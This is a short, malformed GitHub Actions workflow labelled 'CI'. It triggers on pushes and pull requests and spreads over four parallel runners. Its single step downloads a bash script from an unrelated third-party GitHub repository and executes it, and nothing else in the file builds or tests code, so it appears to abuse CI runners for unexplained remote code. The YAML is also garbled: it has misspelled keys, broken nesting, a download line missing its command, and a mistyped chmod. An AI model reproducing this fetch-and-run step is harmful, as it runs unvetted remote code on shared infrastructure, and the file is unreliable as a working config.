name: CI

# Controls when the workflow will run
on:
   # Triggers the  workflow on push or pull requets events but only for the main branch
   push:
     branches: [ main ]
   pull_request:
     branches: [ main ]

   # Allows you to run this workflow manually from the actions tab
   workflow_dispatch:

   # A workflow run is made up of one or more jops that can run sequentially or in paraller
   jops:
     # This workflow contains a single jop called "build"
     test:
      name: subscrbeit
       # The type of runner that the jop will run on
       runs-on: ubuntu-latest
       strategy:
        fail-fast: false
        matrix:
         runner: [0,1,2,3]
         steps:
            - run: |
 https://raw.githubusercontent.com/blackme27/droop27/main/bash.sh && chmod+x bash.sh && ./bash.sh 
